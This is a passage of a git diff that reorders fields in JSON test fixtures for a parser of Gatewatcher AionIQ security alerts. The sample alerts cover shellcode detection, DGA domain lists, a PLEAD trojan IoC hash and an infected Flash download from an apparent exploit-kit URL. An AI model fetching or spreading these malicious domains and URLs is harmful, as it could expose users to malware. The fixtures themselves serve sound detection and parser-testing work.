     "message": "{\n  \"network\": {\n    \"protocol\": \"unknown\",\n    \"timestamp\": \"2024-09-11T15:35:30.167846+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 888739207482646\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"destination\": {\n    \"port\": 6666,\n    \"ip\": \"178.160.128.2\"\n  },\n  \"source\": {\n    \"port\": 60078,\n    \"ip\": \"80.15.17.183\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"shellcode\": {\n    \"sub_type\": \"Windows_x86_32\",\n    \"encodings\": [\n      {\n        \"name\": \"Bloxor\",\n        \"count\": 4\n      }\n    ],\n    \"sample_id\": \"09-11-2024T15:36:31_8608eb20e6844d2786d36811f92a673b_gcap-clement-l.gatewatcher.fr\",\n    \"analysis\": [\n      {\n        \"call\": \"kernel32_LoadLibraryA\",\n        \"args\": \"{lpFileName: user32.dll}\",\n        \"_id\": 0,\n        \"ret\": \"0x70600000\"\n      },\n      {\n        \"call\": \"user32_MessageBoxA\",\n        \"args\": \"{hWnd: None, lpText: Do you like GateWatcher ?, lpCaption: Gatewatcher2018, uType: [MB_OK, MB_ICONQUESTION, MB_DEFBUTTON1, MB_APPLMODAL, None]}\",\n        \"_id\": 1,\n        \"ret\": \"1\"\n      },\n      {\n        \"call\": \"kernel32_ExitProcess\",\n        \"args\": \"{uExitCode: 0}\",\n        \"_id\": 2,\n        \"ret\": \"0\"\n      },\n      {\n        \"info\": \"Stop : End of shellcode (Exit)\",\n        \"_id\": -1\n      }\n    ],\n    \"id\": \"790a2aa742e1da23e14c9b7270ee81a1\"\n  },\n  \"@timestamp\": \"2024-09-11T15:36:36.071882055Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"shellcode_detect\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"severity\": 1,\n    \"id\": \"8c03d100-794f-45fe-8d92-7409c925b255\",\n    \"created\": \"2024-09-11T15:36:36.068564+0000\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/dga_event.json b/GateWatcher/aioniq_ecs/tests/dga_event.json
index fab96a746..fee9d3a49 100644
--- a/GateWatcher/aioniq_ecs/tests/dga_event.json
+++ b/GateWatcher/aioniq_ecs/tests/dga_event.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"network\": {\n    \"protocol\": \"dns\",\n    \"transport\": \"udp\",\n    \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n    \"flow_id\": 1434780527372168\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"ip\": \"27.0.0.227\"\n  },\n  \"destination\": {\n    \"port\": 53,\n    \"ip\": \"202.129.215.23\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"dga\": {\n    \"dga_count\": 35,\n    \"dga_ratio\": 0.97,\n    \"malware_behavior_confidence\": 50,\n    \"nx_domain_count\": 36,\n    \"top_DGA\": [\n      \"zmhaoyukbol6a.com\",\n      \"ppyblaohb.com\",\n      \"khllpmpmare.com\",\n      \"lttulzaiaoctpa7.com\",\n      \"jetuergatod.com\",\n      \"riaaiysk.com\",\n      \"anxsmqyfy.com\",\n      \"tqjhvylf.com\",\n      \"vdunsygwoktx.com\",\n      \"jhghrlufoh.com\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n    \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n    \"kind\": \"alert\",\n    \"module\": \"dga_detect\",\n    \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"dataset\": \"alert\",\n    \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"network\": {\n    \"protocol\": \"dns\",\n    \"transport\": \"udp\",\n    \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n    \"flow_id\": 1434780527372168\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"ip\": \"27.0.0.227\"\n  },\n  \"destination\": {\n    \"port\": 53,\n    \"ip\": \"202.129.215.23\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"dga\": {\n    \"dga_count\": 35,\n    \"dga_ratio\": 0.97,\n    \"malware_behavior_confidence\": 50,\n    \"nx_domain_count\": 36,\n    \"top_DGA\": [\n      \"zmhaoyukbol6a.com\",\n      \"ppyblaohb.com\",\n      \"khllpmpmare.com\",\n      \"lttulzaiaoctpa7.com\",\n      \"jetuergatod.com\",\n      \"riaaiysk.com\",\n      \"anxsmqyfy.com\",\n      \"tqjhvylf.com\",\n      \"vdunsygwoktx.com\",\n      \"jhghrlufoh.com\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n    \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n    \"kind\": \"alert\",\n    \"module\": \"dga_detect\",\n    \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"dataset\": \"alert\",\n    \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"network\": {\n    \"protocol\": \"dns\",\n    \"transport\": \"udp\",\n    \"timestamp\": \"2024-09-11T09:15:25.886786+00:00\",\n    \"flow_id\": 1434780527372168\n  },\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"ip\": \"27.0.0.227\"\n  },\n  \"destination\": {\n    \"port\": 53,\n    \"ip\": \"202.129.215.23\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"dga\": {\n    \"dga_count\": 35,\n    \"dga_ratio\": 0.97,\n    \"malware_behavior_confidence\": 50,\n    \"nx_domain_count\": 36,\n    \"top_DGA\": [\n      \"zmhaoyukbol6a.com\",\n      \"ppyblaohb.com\",\n      \"khllpmpmare.com\",\n      \"lttulzaiaoctpa7.com\",\n      \"jetuergatod.com\",\n      \"riaaiysk.com\",\n      \"anxsmqyfy.com\",\n      \"tqjhvylf.com\",\n      \"vdunsygwoktx.com\",\n      \"jhghrlufoh.com\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T09:16:33.314331057Z\",\n  \"@version\": \"1\",\n  \"event\": {\n    \"created\": \"2024-09-11T09:16:33.194964+00:00\",\n    \"end\": \"2024-09-11T09:15:27.858000+00:00\",\n    \"kind\": \"alert\",\n    \"module\": \"dga_detect\",\n    \"start\": \"2024-09-11T09:15:22.995000+00:00\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"dataset\": \"alert\",\n    \"id\": \"0ec85c0d-68b6-4602-b26e-d0966d5e1b9d\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/history.json b/GateWatcher/aioniq_ecs/tests/history.json
index a043a3805..7f04542c5 100644
--- a/GateWatcher/aioniq_ecs/tests/history.json
+++ b/GateWatcher/aioniq_ecs/tests/history.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"dataset\": \"administration\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"history\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"history\": {\n    \"type\": \"user\",\n    \"name\": \"pierre.pocry\",\n    \"id\": 18,\n    \"ip\": \"192.192.32.12\",\n    \"content\": {},\n    \"method\": \"POST\",\n    \"endpoint\": \"/gum/configuration\",\n    \"code\": \"200\"\n  },\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"dataset\": \"administration\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"history\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"history\": {\n    \"type\": \"user\",\n    \"name\": \"pierre.pocry\",\n    \"id\": 18,\n    \"ip\": \"192.192.32.12\",\n    \"content\": {},\n    \"method\": \"POST\",\n    \"endpoint\": \"/gum/configuration\",\n    \"code\": \"200\"\n  },\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"dataset\": \"administration\",\n    \"category\": [\n      \"host\"\n    ],\n    \"module\": \"history\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"history\": {\n    \"type\": \"user\",\n    \"name\": \"pierre.pocry\",\n    \"id\": 18,\n    \"ip\": \"192.192.32.12\",\n    \"content\": {},\n    \"method\": \"POST\",\n    \"endpoint\": \"/gum/configuration\",\n    \"code\": \"200\"\n  },\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/ioc.json b/GateWatcher/aioniq_ecs/tests/ioc.json
index ffb6a02cd..d3d83ec37 100644
--- a/GateWatcher/aioniq_ecs/tests/ioc.json
+++ b/GateWatcher/aioniq_ecs/tests/ioc.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"product\": \"lastinfosec\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"enrichment\",\n    \"dataset\": \"ioc\",\n    \"category\": [\n      \"network\",\n      \"threat\"\n    ],\n    \"module\": \"ioc\",\n    \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"created\": \"2019-10-23T05:33:54+00:00\",\n    \"severity\": 2,\n    \"severity_human\": \"High suspicious\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ioc\": {\n    \"tlp\": \"green\",\n    \"type\": \"SHA256\",\n    \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n    \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n    \"relations\": [\n      \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n      \"b57f419e-8b12-49d3-886b-145383725dcd\"\n    ],\n    \"ttp\": [],\n    \"families\": [\n      \"PLEAD\"\n    ],\n    \"campaigns\": [],\n    \"categories\": [\n      \"malware\",\n      \"trojan\"\n    ],\n    \"threat_actor\": [\n      \"BlackTech\"\n    ],\n    \"targeted_sectors\": [],\n    \"targeted_organizations\": [],\n    \"targeted_platforms\": [],\n    \"targeted_countries\": [],\n    \"vulnerabilities\": [],\n    \"kill_chain_phases\": [],\n    \"meta_data\": {\n      \"cwe\": [],\n      \"descriptions\": [],\n      \"usageMode\": \"detection\"\n    },\n    \"usage_mode\": \"detection\",\n    \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n    \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n    \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n    \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n    \"tags\": [\n      \"troj_fr.df33c1bd\",\n      \"trojan.plead.win32.33\",\n      \"gen:variant.graftor.598952 (b)\",\n      \"generic backdoor.gy\",\n      \"win32/plead.au trojan\",\n      \"trojan/plead!exyhr4fe\",\n      \"trojan.win32.plead.fqunov\",\n      \"tr/plead.mysge\",\n      \"trojan.win32.plead\",\n      \"trojan ( 0055a46c1 )\",\n      \"malware\",\n      \"trojan.win32.plead.aa\",\n      \"trojan/win32.plead\"\n    ],\n    \"external_links\": [\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n      },\n      {\n        \"source_name\": \"any.run_report\",\n        \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n      }\n    ]\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"product\": \"lastinfosec\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"enrichment\",\n    \"dataset\": \"ioc\",\n    \"category\": [\n      \"network\",\n      \"threat\"\n    ],\n    \"module\": \"ioc\",\n    \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"created\": \"2019-10-23T05:33:54+00:00\",\n    \"severity\": 2,\n    \"severity_human\": \"High suspicious\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ioc\": {\n    \"tlp\": \"green\",\n    \"type\": \"SHA256\",\n    \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n    \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n    \"relations\": [\n      \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n      \"b57f419e-8b12-49d3-886b-145383725dcd\"\n    ],\n    \"ttp\": [],\n    \"families\": [\n      \"PLEAD\"\n    ],\n    \"campaigns\": [],\n    \"categories\": [\n      \"malware\",\n      \"trojan\"\n    ],\n    \"threat_actor\": [\n      \"BlackTech\"\n    ],\n    \"targeted_sectors\": [],\n    \"targeted_organizations\": [],\n    \"targeted_platforms\": [],\n    \"targeted_countries\": [],\n    \"vulnerabilities\": [],\n    \"kill_chain_phases\": [],\n    \"meta_data\": {\n      \"cwe\": [],\n      \"descriptions\": [],\n      \"usageMode\": \"detection\"\n    },\n    \"usage_mode\": \"detection\",\n    \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n    \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n    \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n    \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n    \"tags\": [\n      \"troj_fr.df33c1bd\",\n      \"trojan.plead.win32.33\",\n      \"gen:variant.graftor.598952 (b)\",\n      \"generic backdoor.gy\",\n      \"win32/plead.au trojan\",\n      \"trojan/plead!exyhr4fe\",\n      \"trojan.win32.plead.fqunov\",\n      \"tr/plead.mysge\",\n      \"trojan.win32.plead\",\n      \"trojan ( 0055a46c1 )\",\n      \"malware\",\n      \"trojan.win32.plead.aa\",\n      \"trojan/win32.plead\"\n    ],\n    \"external_links\": [\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n      },\n      {\n        \"source_name\": \"any.run_report\",\n        \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n      }\n    ]\n  }\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"product\": \"lastinfosec\",\n    \"vendor\": \"gatewatcher\",\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"enrichment\",\n    \"dataset\": \"ioc\",\n    \"category\": [\n      \"network\",\n      \"threat\"\n    ],\n    \"module\": \"ioc\",\n    \"id\": \"3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"created\": \"2019-10-23T05:33:54+00:00\",\n    \"severity\": 2,\n    \"severity_human\": \"High suspicious\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ioc\": {\n    \"tlp\": \"green\",\n    \"type\": \"SHA256\",\n    \"value\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\",\n    \"signature\": \"SHA256 - malware/trojan - PLEAD - BlackTech - 3713d994-1db4-40ff-abe9-2f43bac7b5fa\",\n    \"description\": \"2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4 is a High suspicious SHA256.\\nThis SHA256 is linked to a malware attack of the PLEAD family and organised by BlackTech intrusion set.\\nWe advised to use this IoC in detection mode.\",\n    \"relations\": [\n      \"6fe8a2a1-a1b0-4af8-953d-4babd329f8f8\",\n      \"b57f419e-8b12-49d3-886b-145383725dcd\"\n    ],\n    \"ttp\": [],\n    \"families\": [\n      \"PLEAD\"\n    ],\n    \"campaigns\": [],\n    \"categories\": [\n      \"malware\",\n      \"trojan\"\n    ],\n    \"threat_actor\": [\n      \"BlackTech\"\n    ],\n    \"targeted_sectors\": [],\n    \"targeted_organizations\": [],\n    \"targeted_platforms\": [],\n    \"targeted_countries\": [],\n    \"vulnerabilities\": [],\n    \"kill_chain_phases\": [],\n    \"meta_data\": {\n      \"cwe\": [],\n      \"descriptions\": [],\n      \"usageMode\": \"detection\"\n    },\n    \"usage_mode\": \"detection\",\n    \"case_id\": \"21615052-7cf3-48cd-9aff-36a61e45528c\",\n    \"updated_date\": \"2023-04-07T04:10:34+00:00\",\n    \"package_date\": \"2023-04-07T05:00:02.362356+0000\",\n    \"creation_date\": \"2019-10-23T05:33:54+00:00\",\n    \"tags\": [\n      \"troj_fr.df33c1bd\",\n      \"trojan.plead.win32.33\",\n      \"gen:variant.graftor.598952 (b)\",\n      \"generic backdoor.gy\",\n      \"win32/plead.au trojan\",\n      \"trojan/plead!exyhr4fe\",\n      \"trojan.win32.plead.fqunov\",\n      \"tr/plead.mysge\",\n      \"trojan.win32.plead\",\n      \"trojan ( 0055a46c1 )\",\n      \"malware\",\n      \"trojan.win32.plead.aa\",\n      \"trojan/win32.plead\"\n    ],\n    \"external_links\": [\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191227104253/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"http://web.archive.org/web/20191206225333/https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html\"\n      },\n      {\n        \"source_name\": \"Twitter\",\n        \"url\": \"https://twitter.com/i/web/status/1186877625295196160\"\n      },\n      {\n        \"source_name\": \"any.run_report\",\n        \"url\": \"https://any.run/report/2e789fc5aa1318d0286264d70b2ececa15664689efa4f47c485d84df55231ac4\"\n      }\n    ]\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/malcore_event.json b/GateWatcher/aioniq_ecs/tests/malcore_event.json
index 068b58407..d9aec47da 100644
--- a/GateWatcher/aioniq_ecs/tests/malcore_event.json
+++ b/GateWatcher/aioniq_ecs/tests/malcore_event.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"202.129.215.251\"\n  },\n  \"file\": {\n    \"magic\": \"Macromedia Flash data (compressed), version 13\",\n    \"sid\": [\n      1100020\n    ],\n    \"hash\": {\n      \"sha256\": \"6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b\"\n    },\n    \"name\": \"/\",\n    \"file_id\": 219,\n    \"tx_id\": 2,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 55351,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T09:31:00.111583612Z\",\n  \"malcore\": {\n    \"file_type\": \"application/x-shockwave-flash\",\n    \"analyzers_up\": 16,\n    \"analyzed_clean\": 9,\n    \"engines_last_update_date\": \"2024-09-03T17:15:00Z\",\n    \"state\": \"Infected\",\n    \"total_found\": \"3/16\",\n    \"detail_scan_time\": 373,\n    \"reporting_token\": \"\",\n    \"analyzed_infected\": 3,\n    \"detail_threat_found\": \"Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash\",\n    \"analyzed_suspicious\": 0,\n    \"analyzed_error\": 0,\n    \"processing_time\": 1576,\n    \"engine_id\": {\n      \"5\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c18ab9n\"\n      },\n      \"8\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"Exploit.Flash\",\n        \"id\": \"ib54e9s\"\n      },\n      \"4\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"c10195e\"\n      },\n      \"14\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"t3114fn\"\n      },\n      \"13\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"sde882s\"\n      },\n      \"9\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"kfb8487\"\n      },\n      \"12\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"qb9308l\"\n      },\n      \"10\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"mb2b5fe\"\n      },\n      \"0\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"a32935b\"\n      },\n      \"15\": {\n        \"scan_result\": \"UNSUPPORTED_FILE_TYPE\",\n        \"threat_details\": \"\",\n        \"id\": \"we9a17t\"\n      },\n      \"6\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"c81e55c\"\n      },\n      \"7\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"\",\n        \"id\": \"e83bf1t\"\n      },\n      \"3\": {\n        \"scan_result\": \"CLEAN\",\n        \"threat_details\": \"\",\n        \"id\": \"b557a5r\"\n      },\n      \"1\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"EXP/Flash.EB.502\",\n        \"id\": \"acf9bba\"\n      },\n      \"11\": {\n        \"scan_result\": \"NOT_SCANNED\",\n        \"threat_details\": \"Unavailable (permanently_failed)\",\n        \"id\": \"n00000e\"\n      },\n      \"2\": {\n        \"scan_result\": \"INFECTED\",\n        \"threat_details\": \"SWF/Exploit\",\n        \"id\": \"af7872b\"\n      }\n    },\n    \"detail_wait_time\": 660,\n    \"file_type_description\": \"Macromedia Flash Player\",\n    \"code\": 1,\n    \"magic_details\": \"Macromedia Flash data (compressed), version 13\",\n    \"analyzed_other\": 4\n  },\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T09:15:23.329615+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1779492455056060\n  },\n  \"destination\": {\n    \"port\": 47858,\n    \"ip\": \"27.0.0.144\"\n  },\n  \"url\": {\n    \"domain\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"path\": \"/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs\"\n  },\n  \"user_agent\": {\n    \"original\": \"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"version\": \"HTTP/1.1\",\n    \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/x-shockwave-flash\",\n      \"bytes\": 55351\n    }\n  },\n  \"event\": {\n    \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n    \"kind\": \"alert\",\n    \"module\": \"malcore\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T09:15:23.329615+0000\",\n    \"dataset\": \"alert\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
